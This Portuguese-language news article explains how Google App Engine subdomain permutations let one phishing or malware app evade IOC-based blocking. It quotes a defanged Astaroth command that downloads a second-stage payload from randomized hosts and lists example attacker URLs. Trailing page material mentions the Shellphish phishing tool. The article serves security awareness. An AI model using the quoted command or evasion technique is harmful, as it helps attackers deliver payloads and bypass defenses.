Uma técnica descoberta recentemente por um pesquisador mostra como os domínios do Google App Engine podem ser usados indevidamente para fornecer phishing e malware sem serem detectados pelos principais produtos de segurança empresarial.
O Google App Engine é uma plataforma de serviço baseada em nuvem para desenvolvimento e hospedagem de aplicativos da web nos servidores do Google.
Embora os relatórios de campanhas de phishing que utilizam domínios de nuvem corporativos não sejam novidade, tornando a infraestrutura do Google App Engine arriscada na forma como os subdomínios são gerados e as rotas roteadas.
índice
- Subdomínios praticamente ilimitados para um aplicativo
- "Verified by Google Trust Services" indica confiança de todos.
- Usado ativamente para ataques de phishing
Subdomínios praticamente ilimitados para um aplicativo
Os fraudadores geralmente usam serviços de nuvem para criar um aplicativo malicioso que recebe um subdomínio. Então eles hospedam páginas de phishing lá. Ou eles podem usar o aplicativo como um servidor de comando e controle (C2) para entregar cargas de malware.
Mas as estruturas de URL geralmente são geradas de uma forma que as torna fáceis de monitorar e bloquear usando produtos de segurança corporativa, caso haja necessidade.
Por exemplo, um aplicativo mal-intencionado hospedado nos serviços do Microsoft Azure pode ter uma estrutura de URL como: https://example-subdomain.app123.web.core.windows.net/…
Portanto, um profissional de segurança cibernética pode bloquear o tráfego de e para esse aplicativo específico simplesmente bloqueando solicitações de e para esse subdomínio. Isso não impediria a comunicação com o restante dos aplicativos do Microsoft Azure que usam outros subdomínios.
No entanto, fica um pouco mais complicado no caso do Google App Engine.
O pesquisador de segurança Marcel Afrahim demonstrou um design esperado do gerador de subdomínio do Google App Engine, que pode ser abusado para usar a infraestrutura do aplicativo para fins maliciosos, sem que ninguém perceba.
O domínio Google appspot.com , que hospeda os aplicativos, tem a seguinte estrutura de URL:
VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com
Um subdomínio, nesse caso, não representa apenas um aplicativo, ele representa os campos de versão, nome do serviço, ID do projeto e ID da região de um aplicativo.
Mas o ponto mais importante a ser observado aqui é que, se um desses campos estiver incorreto, o Google App Engine não exibirá uma página 404 Not Found, mas exibirá a página "padrão" do aplicativo (um conceito chamado soft path ).
"As solicitações são recebidas em qualquer versão configurada para o tráfego no serviço de destino. Se o serviço para o qual está sendo direcionado não existe, a solicitação é roteada", diz Afrahim, acrescentando:
"Se uma solicitação corresponder à parte PROJECT_ID.REGION_ID.r.appspot.com do nome do host, mas incluir um serviço, versão ou nome de instância que não existe, a solicitação será roteada para o serviço padrão, que é essencialmente o padrão nome. host do aplicativo".
Basicamente, isso significa que existem muitas permutações de subdomínios para acessar o aplicativo malicioso do invasor. Desde que cada subdomínio tenha um campo "project_ID" válido, variações inválidas de outros campos podem ser usadas a critério do invasor para gerar uma longa lista de subdomínios, todos levando ao mesmo aplicativo.
Por exemplo, como mostra Afrahim, os dois URLs a seguir, que parecem drasticamente diferentes, representam o mesmo aplicativo hospedado no Google App Engine.
https://random123-random123-random123-dot-bad-app-2020.ue.r.appspot.com
https://insertanythingyouwanthere-xyz123-xyz123-dot-bad-app-2020.ue.r.appspot.com
"Verified by Google Trust Services" indica confiança de todos.
O fato de um único aplicativo malicioso agora ser representado por várias permutações de seus subdomínios dificulta o bloqueio de atividades maliciosas por administradores de sistema e profissionais de segurança.
Além disso, para um usuário sem experiência tecnológica, todos esses subdomínios pareceriam um "site seguro". Afinal, o domínio appspot.com e todos os seus subdomínios têm o selo "Google Trust Services" em seus certificados SSL.
Sites do Google App Engine que exibem um certificado SSL válido com o texto "Verificado por: Google Trust Services"
Fonte: Afrahim
Além disso, a maioria das soluções de segurança corporativa, como o Symantec WebPulse Web Filtering, permite automaticamente o tráfego para sites de categorias confiáveis. E google appspot.com O domínio, devido à sua reputação e casos de uso comercial legítimos, recebe um rótulo "Aplicativos de escritório/negócios", ignorando a verificação de proxy da web.
Confiado automaticamente pela maioria das soluções de segurança corporativa
Além disso, um grande número de variantes de subdomínio torna inútil a abordagem de bloqueio baseada em IOC.
Uma captura de tela de um aplicativo de teste criado por Afrahim junto com um "como fazer" detalhado demonstra esse comportamento em ação.
No passado, a geração de domínio da Cloudflare tinha uma falha de design semelhante à que o malware Astaroth podia ser explorado pelo seguinte comando enquanto recuperava a carga útil do estágio 2:
%ComSpec% /c "echo GetObject("Script: hxxps://xsw%RANDOM%nnccccmd95c22[.]cloud-workers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b2315decglad9prod9c2c2debed ativatormaster. /")">%temp%Lbqvvncxnch:Lbqvvxncxmm:temp vbvvjjh.js"
Basicamente, isso iniciará um prompt de comando do Windows e inserirá um número aleatório em vez de %RANDOM%, o que tornará o URL de upload realmente dinâmico.
"E agora você tem um script que baixa a carga útil de diferentes nomes de host de URL cada vez que é executado e tornaria o CIO da rede dessa amostra hipotética absolutamente inútil. Soluções que dependem de uma única execução em um sandbox para obter IOCs automatizados posteriormente, um nova rede IOC e um potencialmente novo arquivo IOC se o script for alterado um pouco", disse o pesquisador.
Distribuir malware por meio de variantes de subdomínio do Google App Engine ignorando os bloqueios IOC
Usado ativamente para ataques de phishing
O engenheiro de segurança e pentestro Yusuke Osumi twittou na semana passada que uma página de phishing da Microsoft estava hospedada no subdomínio appspot.com que estava aproveitando a falha de design descrita por Afrahim.
Osumi também compilou um arquivo listando mais de 2.000 subdomínios gerados dinamicamente pelo aplicativo de phishing, todos representando a mesma página de phishing.
Exploração ativa de subdomínios do Google App Engine em ataques de phishing
Fonte: Twitter
Este exemplo recente mudou o foco da discussão sobre o que pode ser o bug do Google App Engine. potencialmente explorado para desencadear campanhas de phishing, aproveitando a falha de design na natureza.
“Ele usa um kit/serviço de phishing do Google Drive no Google App Engine e um usuário normal não perceberia que o Google não pede credenciais”, concluiu Afrahim em seu post no blog.
- O aplicativo Strava mostra suas informações para usuários próximos, a menos que essa configuração esteja desativada
- O serviço de e-mail criptografado da Tutanota sofre com ataques cibernéticos DDoS
descubra mais conteúdo
Você pode ocultar um amigo de outro amigo no Facebook?
O que é um amplificador integrado?
Google Pixel Watch também tem detecção de queda, mas não até o próximo ano
As melhores xícaras de café aquecidas de 2022
Como automatizar seu iPhone com base na hora, atividade ou localização
"Isso deve ter sido antes do meu tempo"
Deixe uma resposta Cancelar resposta
Como eles phishing você?
O ataque é realizado por meio de comunicações eletrônicas, como e-mail ou telefonema. O invasor se faz passar por uma pessoa ou organização confiável. O objetivo é obter informações pessoais confidenciais, como credenciais de login ou números de cartão de crédito.
O que são páginas de phishing?
Phishing Phishing é um método de induzir você a compartilhar senhas, números de cartão de crédito e outras informações confidenciais, fazendo-se passar por uma instituição confiável em uma mensagem de e-mail ou telefonema.
Onde o phishing é encontrado?
Como funciona o phishing
A maioria dos ataques de phishing começa com o recebimento de um e-mail ou mensagem direta em que o remetente se faz passar por um banco, empresa ou outra organização real para enganar o destinatário.
O que é Marisco?
Introdução e uso de Shellphish
É uma ferramenta que disponibiliza um conjunto de templates para os sites mais populares da Internet, incluindo Facebook, Twitter, Netflix, Instagram, entre outros.